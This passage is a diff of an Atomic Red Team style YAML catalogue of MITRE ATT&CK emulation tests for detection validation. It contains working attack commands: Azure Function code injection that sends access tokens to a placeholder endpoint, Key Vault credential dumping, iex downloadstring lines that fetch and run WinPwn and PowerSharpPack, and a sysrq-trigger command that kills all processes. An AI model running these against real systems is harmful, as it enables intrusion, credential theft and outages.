-          Upload new funciton code if download of existing code succeeded\n        if
-          (\"#{execution_option}\" -eq \"insert_code\") {\n            # Download
-          file from file share for injection\n            $tmpFunctionCode = Join-Path
-          $env:temp/ (\"T1550.001_tmp_to_inject_\" + $tmpOriginalFileName)\n            az
-          storage file download --account-name \"#{storage_account_name}\" --share-name
-          \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors --dest $tmpFunctionCode\n
-          \           \n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code download failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"File downloaded: $($tmpFunctionCode)\"\n            \n
-          \           $insertContent = Get-Content -Path \"#{code_to_insert_path}\"
-          -Raw  # Load the content of the insert file\n            \n            $content
-          = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file\n            $content
-          = $insertContent + \"`n\" + $content     # Insert the new code at the beginning\n
-          \           $content | Set-Content -Path $tmpFunctionCode       # Write
-          the modified content to the file\n            \n            # Upload file
-          to file share\n            az storage file upload --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --source $tmpFunctionCode
-          --only-show-errors\n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code upload failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"Uploaded the tampered file\"\n        } elseif
-          (\"#{execution_option}\" -eq \"replace_file\") {\n            az storage
-          file upload --account-name \"#{storage_account_name}\" --share-name \"#{file_share_name}\"
-          -p \"#{file_path}\" --source \"#{code_to_insert_path}\" --only-show-errors\n
-          \           if ($LASTEXITCODE -ne 0) {\n                Write-Output \"Function
-          code upload failed.\"\n                exit 1\n            }\n            Write-Output
-          \"Uploaded the tampered file\"\n        } else {\n            Write-Output
-          \"Please choose a valid execution_option\"\n            exit 1\n        }\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + $tmpOriginalFileName)
-          az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original f file if upload succeeded
-              if ("#{execution_option}" -eq "insert_code") {
-                  $tmpFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_to_inject_" + $tmpOriginalFileName)
-                  Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
-                  Write-Output "Deleted tmp file: $($tmpFunctionCode)"
-              }
-
-              # Delete tmp original file
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
+    atomic_tests: []
 credential-access:
  T1557:
    technique:
@@ -100184,75 +100142,220 @@ credential-access:
      - 'User Account: User Account Modification'
      identifier: T1528
    atomic_tests:
-    - name: Azure - Dump All Azure Key Vaults with Microburst
-      auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
-      description: |-
-        Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
-        See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
+    - name: Azure - Functions code upload - Functions code injection via Blob upload
+      auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
+      description: "This test injects code into an Azure Function (RCE).\n\nAttack
+        idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nSimilar
+        to T1528 \"Azure - Functions code upload - Functions code injection to retrieve
+        the Functions identity access token\", the depicted code injection scenario
+        tampers the source code of Azure Functions to perform Subscription Privilege
+        Escalation by retrieving the identity access token of an Azure functions instance.
+        In this case, the prepared zip file (underlying package for a Function) is
+        expected to contain the tampered function presented in src/code_to_insert.py.
+        Note that the endpoint https://changeme.net needs to be adapted in your packed
+        function code.\n\nNote:\n- The Azure Function modified in this test must be
+        hosted via Azure Blob storage (Info on storage considerations for Azure Function:
+        https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
+        \n- For Function code upload to Azure Functions that are hosted via Azure
+        Files in a File Share, refer to T1528 \"Azure - Functions code upload - Functions
+        code injection to retrieve the Functions identity access token\".\n- The required
+        input fields can be retrieved in a reconnaissance step in test T1619 \"Azure
+        - Enumerate Storage Account Objects via Key-based authentication using Azure
+        CLI\". The code of function apps may be inspected and prepared from the result
+        of test T1530 \"Azure - Dump Azure Storage Account Objects via Azure CLI\".\n\nRequirements:\n-
+        The test is intended to be executed in interactive mode (with -Interactive
+        parameter) in order to complete the az login command when MFA is required.\n-
+        The EntraID user must have the role \"Storage Account Contributor\", or a
+        role with similar permissions."
      supported_platforms:
      - iaas:azure
      input_arguments:
-        username:
-          description: Azure AD username
+        storage_account_name:
          type: string
-          default:
-        password:
-          description: Azure AD password
+          default: storage_account_name_example
+          description: Name of storage account that is related to the Function
+        container_name:
          type: string
-          default: T1082Az
-        output_file:
-          description: File to dump results to
+          default: container_name_example
+          description: Name of the container that contains the function blob
+        blob_name:
          type: string
-          default: "$env:temp\\T1528Test1.txt"
-        subscription_id:
-          description: Azure subscription id to search
-          type: string
-          default:
+          default: blob_example
+          description: Name of the function blob
+        file_path_blob:
+          type: path
+          default: "$env:temp/T1528_function_code.zip"
+          description: Path to the function code file to upload as blob
      dependency_executor_name: powershell
      dependencies:
-      - description: 'The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
-
-          '
-        prereq_command: 'if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit
-          0} else {exit 1}
-
-          '
-        get_prereq_command: |
-          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-          invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
-      - description: 'The Azure RM module must be installed.
-
-          '
-        prereq_command: 'try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue)
+      - description: Azure CLI must be installed
+        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
          {exit 0} else {exit 1}} catch {exit 1}
-
-          '
-        get_prereq_command: 'Install-Module -Name AzureRM -Force -allowclobber
-
-          '
-      - description: 'The Azure module must be installed.
-
-          '
-        prereq_command: 'try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-
-          '
-        get_prereq_command: 'Install-Module -Name Azure -Force -allowclobber
-
-          '
+        get_prereq_command: Install-Module -Name Az -Force
      executor:
-        command: |
-          import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
-          $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
-          Connect-AzureRmAccount -Credential $Credential
-          Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
-          cat #{output_file}
-        cleanup_command: 'remove-item #{output_file} -force -erroraction silentlycontinue
+        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
+          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
+          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
+          be true or null\n    Write-Output \"Shared key access is disabled for this
+          storage account.\"\n} else {    \n    $connectionString = az storage account
+          show-connection-string --name \"#{storage_account_name}\" --query connectionString
+          --output tsv\n\n    # Download blob for cleanup\n    $tmpOriginalFunctionCode
+          = Join-Path $env:temp/ (\"T1528_tmp_original_\" + \"#{blob_name}\")\n    az
+          storage blob download --connection-string $connectionString --container-name
+          \"#{container_name}\" --name \"#{blob_name}\" --file $tmpOriginalFunctionCode
+          --overwrite true\n\n    if ($LASTEXITCODE -eq 0) {\n        # Upload new
+          blob version if download of existing blob succeeded\n        az storage
+          blob upload --connection-string $connectionString --container-name \"#{container_name}\"
+          --name \"#{blob_name}\" --file \"#{file_path_blob}\" --overwrite true\n
+          \   } else {\n        Write-Output \"Download original function code failed.\"\n
+          \       exit 1\n    }\n}\n"
+        cleanup_command: |-
+          az login    # Log in to Azure CLI

-          '
+          # Upload previous funciton code
+          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + "#{blob_name}")
+          az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
+
+          if ($LASTEXITCODE -eq 0) {
+              Write-Output "Uploaded original version of function code."
+
+              # Delete tmp original blob file if upload succeeded
+              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+              Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
+          } else {
+              Write-Output "Upload original function code failed."
+          }
        name: powershell
-        elevation_required: true
+        elevation_required: false
+    - name: Azure - Functions code upload - Functions code injection via File Share
+        modification to retrieve the Functions identity access token
+      auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
+      description: "This test injects code into an Azure Function (RCE) to perform
+        Subscription Privilege Escalation by retrieving the identity access token
+        of an Azure functions instance.\n\nAttack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nOnce
+        executed, the \"https://changeme\" will retrieve the access token when the
+        function app is executed on behalf of the tenant. The function may be triggered
+        manually from authorized people, triggered in regular intervals, or in various
+        other ways. The access token can then be used to perform further attack steps
+        with the permissions that the function app holds (e.g. listening virtual machines).\n\nNote:
+        \n- The Azure Function modified in this test must be hosted via Azure Files
+        in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).\n-
+        For Function code upload to Azure Functions that are hosted via Azure Blob
+        storage, refer to T1528 \"Azure - Functions code upload - Functions code injection
+        via Blob upload\".\n- The required input fields can be retrieved in a reconnaissance
+        step in test T1619 \"Azure - Enumerate Storage Account Objects via Key-based
+        authentication using Azure CLI\". The code of function apps may be inspected
+        and prepared from the result of test T1530 \"Azure - Dump Azure Storage Account
+        Objects via Azure CLI\".\n- Important: Change the https://changeme.net in
+        code_to_insert_path to a self-controlled endpoint. This endpoint can be hosted
+        e.g. as request bin via Pipedream to display the body of incoming POST requests.\n-
+        The default injected code to retrieve the access token can be replaced by
+        arbitrary other code. In this case: Replace the code defined in code_to_insert_path\n\nRequirements:\n-
+        The test is intended to be executed in interactive mode (with -Interactive
+        parameter) in order to complete the az login command when MFA is required.\n-
+        The EntraID user must have the role \"Storage Account Contributor\", or a
+        role with similar permissions.\n\nExecution options: Defined by the input
+        field execution_option\n- insert_code: This option (1) downloads the existing
+        funciton code into a tmp file, (2) injects the code from code_to_insert_path
+        at the beginning of the file, and (3) uploads the tampered file to the targeted
+        Azure Function code (Azure File Share File).\n- replace_file: This option
+        uploads the function code defined in code_to_insert_path to the targeted Azure
+        Function code (Azure File Share File)."
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        storage_account_name:
+          type: string
+          default: storage_account_name_example
+          description: Name of storage account that is related to the Function
+        execution_option:
+          type: string
+          default: insert_code
+          description: Chooses execution option insert_code, or replace_file
+        file_share_name:
+          type: string
+          default: file_share_name_example
+          description: Name of the file share that is related to the Function
+        file_path:
+          type: path
+          default: site/wwwroot/function_app.py
+          description: Path to the Function file in the file share
+        code_to_insert_path:
+          type: path
+          default: "$PathToAtomicsFolder/T1528/src/code_to_insert.py"
+          description: The code that will be injected into the Function
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Azure CLI must be installed
+        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+        get_prereq_command: Install-Module -Name Az -Force
+      executor:
+        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
+          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
+          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
+          be true or null\n    Write-Output \"Shared key access is disabled for this
+          storage account.\"\n} else {\n    # Download file for cleanup\n    $tmpOriginalFileName
+          = [System.IO.Path]::GetFileName(\"#{file_path}\")\n    $tmpOriginalFunctionCode
+          = Join-Path $env:temp/ (\"T1528_tmp_original_\" + $tmpOriginalFileName)\n
+          \   az storage file download --account-name \"#{storage_account_name}\"
+          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors
+          --dest $tmpOriginalFunctionCode\n\n    if ($LASTEXITCODE -eq 0) {\n        #
+          Upload new funciton code if download of existing code succeeded\n        if
+          (\"#{execution_option}\" -eq \"insert_code\") {\n            # Download
+          file from file share for injection\n            $tmpFunctionCode = Join-Path
+          $env:temp/ (\"T1528_tmp_to_inject_\" + $tmpOriginalFileName)\n            az
+          storage file download --account-name \"#{storage_account_name}\" --share-name
+          \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors --dest $tmpFunctionCode\n
+          \           \n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
+          \"Function code download failed.\"\n                exit 1\n            }\n
+          \           Write-Output \"File downloaded: $($tmpFunctionCode)\"\n            \n
+          \           $insertContent = Get-Content -Path \"#{code_to_insert_path}\"
+          -Raw  # Load the content of the insert file\n            \n            $content
+          = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file\n            $content
+          = $insertContent + \"`n\" + $content     # Insert the new code at the beginning\n
+          \           $content | Set-Content -Path $tmpFunctionCode       # Write
+          the modified content to the file\n            \n            # Upload file
+          to file share\n            az storage file upload --account-name \"#{storage_account_name}\"
+          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --source $tmpFunctionCode
+          --only-show-errors\n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
+          \"Function code upload failed.\"\n                exit 1\n            }\n
+          \           Write-Output \"Uploaded the tampered file\"\n        } elseif
+          (\"#{execution_option}\" -eq \"replace_file\") {\n            az storage
+          file upload --account-name \"#{storage_account_name}\" --share-name \"#{file_share_name}\"
+          -p \"#{file_path}\" --source \"#{code_to_insert_path}\" --only-show-errors\n
+          \           if ($LASTEXITCODE -ne 0) {\n                Write-Output \"Function
+          code upload failed.\"\n                exit 1\n            }\n            Write-Output
+          \"Uploaded the tampered file\"\n        } else {\n            Write-Output
+          \"Please choose a valid execution_option\"\n            exit 1\n        }\n
+          \   } else {\n        Write-Output \"Download original function code failed.\"\n
+          \       exit 1\n    }\n}"
+        cleanup_command: |-
+          az login    # Log in to Azure CLI
+
+          # Upload previous funciton code
+          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
+          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + $tmpOriginalFileName)
+          az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
+
+          if ($LASTEXITCODE -eq 0) {
+              Write-Output "Uploaded original version of function code."
+
+              # Delete tmp original f file if upload succeeded
+              if ("#{execution_option}" -eq "insert_code") {
+                  $tmpFunctionCode = Join-Path $env:temp/ ("T1528_tmp_to_inject_" + $tmpOriginalFileName)
+                  Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
+                  Write-Output "Deleted tmp file: $($tmpFunctionCode)"
+              }
+
+              # Delete tmp original file
+              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+              Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
+          } else {
+              Write-Output "Upload original function code failed."
+          }
+        name: powershell
+        elevation_required: false
  T1552.006:
    technique:
      type: attack-pattern
@@ -101638,7 +101741,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T22:03:00.834Z'
-      name: Cloud Secrets Management Stores
+      name: 'Credentials from Password Stores: Cloud Secrets Management Stores'
      description: "Adversaries may acquire credentials from cloud-native secret management
        solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
        and Terraform Vault.  \n\nSecrets managers support the secure centralized
@@ -101674,7 +101777,77 @@ credential-access:
      x_mitre_version: '1.0'
      x_mitre_data_sources:
      - 'Cloud Service: Cloud Service Enumeration'
-    atomic_tests: []
+      identifier: T1555.006
+    atomic_tests:
+    - name: Azure - Dump All Azure Key Vaults with Microburst
+      auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
+      description: |-
+        Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
+        See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: string
+          default:
+        password:
+          description: Azure AD password
+          type: string
+          default: T1082Az
+        output_file:
+          description: File to dump results to
+          type: string
+          default: "$env:temp\\T1528Test1.txt"
+        subscription_id:
+          description: Azure subscription id to search
+          type: string
+          default:
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
+
+          '
+        prereq_command: 'if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+      - description: 'The Azure RM module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name AzureRM -Force -allowclobber
+
+          '
+      - description: 'The Azure module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Azure -Force -allowclobber
+
+          '
+      executor:
+        command: |
+          import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+          $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+          Connect-AzureRmAccount -Credential $Credential
+          Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'remove-item #{output_file} -force -erroraction silentlycontinue
+
+          '
+        name: powershell
+        elevation_required: true
  T1003.008:
    technique:
      type: attack-pattern
@@ -105709,10 +105882,10 @@ discovery:
      - windows
      executor:
        command: |
-          net groups "Account Operators" /doma
-          net groups "Exchange Organization Management" /doma
-          net group "BUILTIN\Backup Operators" /doma
-          net group /domai "Domain Admins"
+          net groups "Account Operators" /domain
+          net groups "Exchange Organization Management" /domain
+          net group "BUILTIN\Backup Operators" /domain
+          net group "Domain Admins" /domain
        name: command_prompt
    - name: Find machines where user has local admin access (PowerView)
      auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1
@@ -107465,6 +107638,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          winPEAS -noninteractive -consoleoutput
        name: powershell
@@ -107476,6 +107650,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          itm4nprivesc -noninteractive -consoleoutput
        name: powershell
@@ -107486,6 +107661,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          oldchecks -noninteractive -consoleoutput
        cleanup_command: |-
@@ -107502,6 +107678,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          otherchecks -noninteractive -consoleoutput
        name: powershell
@@ -107513,6 +107690,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          Generalrecon -consoleoutput -noninteractive
        name: powershell
@@ -107524,6 +107702,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          Morerecon -noninteractive -consoleoutput
        name: powershell
@@ -107535,6 +107714,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          RBCD-Check -consoleoutput -noninteractive
        name: powershell
@@ -107546,6 +107726,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
          Invoke-watson
        name: powershell
@@ -107557,6 +107738,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
          Invoke-SharpUp -command "audit"
        name: powershell
@@ -107570,6 +107752,7 @@ discovery:
      - windows
      executor:
        command: |-
+          $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
          Invoke-Seatbelt -Command "-group=all"
        name: powershell
@@ -109674,6 +109857,18 @@ discovery:
          '
        name: command_prompt
        elevation_required: false
+    - name: Identifying Network Shares - Linux
+      auto_generated_guid: 361fe49d-0c19-46ec-a483-ccb92d38e88e
+      description: |
+        If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
+        Attackers may then attempt to access these shares for lateral movement or data exfiltration.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'findmnt -t nfs
+
+          '
+        name: sh
  T1049:
    technique:
      type: attack-pattern
@@ -110090,6 +110285,99 @@ discovery:
          Write-Output "Removed #{output_file}"
        name: powershell
        elevation_required: false
+    - name: Azure - Scan for Anonymous Access to Azure Storage (Powershell)
+      auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0
+      description: "Upon successful execution, this test will test for anonymous access
+        to Azure storage containers by invoking a web request and outputting the results
+        to a file. \nThe corresponding response could then be interpreted to determine
+        whether or not the resource/container exists, as well as other information.
+        \nSee https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service
+        \    \n"
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        base_name:
+          description: Azure storage account name to test
+          type: string
+          default: T1619Test2
+        output_file:
+          description: File to output results to
+          type: string
+          default: "$env:temp\\T1619Test2.txt"
+        container_name:
+          description: Container name to search for (optional)
+          type: string
+          default:
+        blob_name:
+          description: Blob name to search for (optional)
+          type: string
+          default:
+      executor:
+        command: |
+          try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
+          catch [system.net.webexception]
+          {if($_.Exception.Response -ne $null)
+          {$Response = $_.Exception.Response.GetResponseStream()
+          $ReadResponse = New-Object System.IO.StreamReader($Response)
+          $ReadResponse.BaseStream.Position = 0
+          $responseBody = $ReadResponse.ReadToEnd()}
+          else {$responseBody = "The storage account could not be anonymously accessed."}}
+          "Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
+        cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
+
+          '
+        name: powershell
+    - name: Azure - Enumerate Azure Blobs with MicroBurst
+      auto_generated_guid: 3dab4bcc-667f-4459-aea7-4162dd2d6590
+      description: "Upon successful execution, this test will utilize a wordlist to
+        enumerate the public facing containers and blobs of a specified Azure storage
+        account. \nSee https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/
+        . \n"
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        base:
+          description: Azure blob keyword to enumerate (Example, storage account name)
+          type: string
+          default: secure
+        output_file:
+          description: File to output results to
+          type: string
+          default: "$env:temp\\T1619Test1.txt"
+        wordlist:
+          description: File path to keywords for search permutations
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\permutations.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads.
+
+          '
+        prereq_command: 'if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"){exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
+      - description: 'The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads.
+
+          '
+        prereq_command: 'if (test-path "#{wordlist}"){exit 0} else {exit 1}
+
+          '
+        get_prereq_command: 'invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt"
+          -outfile "#{wordlist}"
+
+          '
+      executor:
+        command: |
+          import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
+          Invoke-EnumerateAzureBlobs -base #{base} -permutations "#{wordlist}" -outputfile "#{output_file}"
+        cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
+
+          '
+        name: powershell
  T1654:
    technique:
      type: attack-pattern
@@ -119810,6 +120098,21 @@ impact:
          '
        name: sh
        elevation_required: true
+    - name: Abuse of linux magic system request key for Send a SIGTERM to all processes
+      auto_generated_guid: 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+      description: 'Adversaries with root or sufficient privileges Send a SIGTERM
+        to all processes, except for init. By writing ''e'' to /proc/sysrq-trigger,
+        they can forced kill all processes, except for init.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'echo "e" > /proc/sysrq-trigger
+
+          '
+        name: bash
+        elevation_required: true
  T1499.004:
    technique:
      type: attack-pattern
@@ -120492,6 +120795,84 @@ impact:
          '
        name: command_prompt
        elevation_required: false
+    - name: Windows - Display a simulated ransom note via Notepad (non-destructive)
+      auto_generated_guid: 0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5
+      description: |
+        Creates a temporary ransom-note text file and opens it in Notepad to
+        simulate ransomware "note display" behavior without making destructive
+        changes. SAFE and non-destructive.
+      supported_platforms:
+      - windows
+      input_arguments:
+        note_filename:
+          description: File name for the simulated ransom note
+          type: string
+          default: ART-T1491-ransom-note.txt
+        pid_filename:
+          description: File name for storing Notepad PID
+          type: string
+          default: ART-T1491-notepad.pid
+        note_title:
+          description: Title at the top of the ransom note
+          type: string
+          default: "!!! READ_ME_NOW !!!"
+        note_body:
+          description: The body of the ransom note (plain text)
+          type: string
+          default: |
+            Your files are SAFE. This is a TEST note for detection validation
